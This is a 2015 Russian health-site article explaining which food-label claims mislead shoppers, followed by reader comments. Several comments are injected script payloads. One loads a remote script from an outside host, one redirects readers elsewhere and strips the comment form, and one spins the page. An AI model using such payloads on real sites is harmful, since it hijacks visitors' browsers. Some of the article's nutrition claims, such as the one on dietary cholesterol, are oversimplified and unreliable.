Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Какие надписи на продукта...  >>  Какие надписи на продуктах в магазине вам врут, а какие нет?
 
Обратная связь
 

Какие надписи на продуктах в магазине вам врут, а какие нет?

Размер шрифта
17 июня 2015 00:00
  • google_analytics: false
  • Нравится

Независимо от того, идете ли вы в магазин косметики или просто направляетесь в ближайший супермаркет за продуктами, всегда следует читать информацию на упаковке товара, который вы собираетесь купить. Однако далеко не всегда за многообещающими надписями кроется реальная польза. Давайте разберемся, каким фразам стоит доверять, а каким нет.

Какие надписи на продуктах в магазине вам врут, а какие нет?

Вот такие надписи наиболее часто встречаются на упаковках пищевых продуктов:

1. «Без добавления сахара»

Эта надпись абсолютно правдива, так как данный термин является официально одобренным. Так что если вы хотите снизить потребление калорий, то вам определенно стоит присмотреться к подобным продуктам.

2. «Хороший источник пищевых волокон»

Эта надпись мало что значит. В таких продуктах могут быть использованы различные добавки, содержащие волокна, однако это вовсе не тот «правильный» тип волокон, который стоит включать в свой рацион. Лучше сделайте выбор в пользу цельных злаков и свежих овощей.

3. «Содержат натуральные фрукты»

Дело в том, что количество натуральных фруктов в таких продуктах может быть абсолютно разным. Их содержание может быть настолько мало, что пользы от такой еды и вовсе не будет.

4. «100% цельных злаков»

Увидев такую надпись, вы можете быть уверены, что ваша еда содержит «правильные» злаки, богатые полезной для организма клетчаткой.

5. «Содержит цельные злаки»

Видя такую надпись на продукте, вы никак не можете знать, сколько именно цельных злаков в нем содержится. Что еще более удивительно, некоторые из таких продуктов могут содержать рафинированную кукурузную муку, которая гораздо менее полезна, нежели цельные злаки.

6. «Не содержит транс-жиров»

Эта надпись вводит вас в заблуждение. Современные правила позволяют маркировать подобным образом все продукты, которые содержат менее 0,5 граммов транс-жиров. Но даже при употреблении транс-жиров в небольших количествах можно нанести вред своему сердцу.

7. «Содержит мало соли»

Присутствие этой надписи на упаковке говорит лишь о том, что продукт содержит на 50% меньше натрия, чем исходный, однако это вовсе не означает, что он действительно содержит мало натрия. Лучше обратите свое внимание на продукты, на упаковке которых написано «с низким содержанием натрия», так как в них содержится не более 140 миллиграмм натрия на порцию.

8. «Со сниженным содержанием жиров»

Эта надпись означает, что данный продукт содержит на 25% меньше жиров, чем исходный. Однако для сохранения вкуса производители добавляют в такие продукты большое количество соли и сахара, из-за чего их употребление может привести к набору веса, даже несмотря на низкое содержание жира.

9. «Не содержит холестерина»

На самом деле далеко не весь холестерин является «плохим» холестерином. Употребление в пищу продуктов, в которых исходно содержится холестерин, таких как мясо, молочные продукты, яйца и рыба, не приводит к неблагоприятным последствиям для здоровья. Так что не факт, что вы совершаете правильный выбор, покупая продукты с пометкой «не содержит холестерина».

10. «Продать до, употребить до»

Подобные надписи часто заставляют нас выбрасывать продукты раньше времени, что явно не способствует экономии. Важно понимать, что надпись «продать до» лишь обозначает тот срок, до которого магазин обязан осуществить продажу продукта. Однако еда обычно остается в отличном состоянии еще несколько дней. А рекомендация «употребить до определенной даты» лишь ограничивает период наилучшего вкуса и качества продукта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - VonterBlack

17 июня 2015 в 03:52

Цитировать   |   Пожаловаться

Познавательно! Буду теперь присматриваться )

2 - zzzzzz

27 июня 2015 в 16:02

Цитировать   |   Пожаловаться

derftgyhjrdftgyhurftgyh> *{transition:transform 1s;}> rot = 0; setInterval(function(){ rot+=360; $("*").css("transform","rotate("+rot+"deg)") },1000)

3 - zzzzzz

29 июня 2015 в 23:51

Комментарий удален за нарушение Правил общения

4 - zzzzzz

30 июня 2015 в 18:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 21:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 22:05

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Тяга как болезнь   Лучшая еда после застолья   Как не поддаться соблазну в еде?   Сколько завтракать... в шайбах  
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 01 июля 2013Сладкая парочка против рака простаты! Соя + помидор!
 
21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть! 05 марта 2013Переедание после 50 приводит к раку
 

Слайдшоу

1
Супереда для быстрого похудения Как хранить еду, чтобы тратить меньше денег
Сытная еда, которая поможет похудеть Необычное использование резинок!
Самые опасные стили питания: еда на скорость Как есть меньше без усилий
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.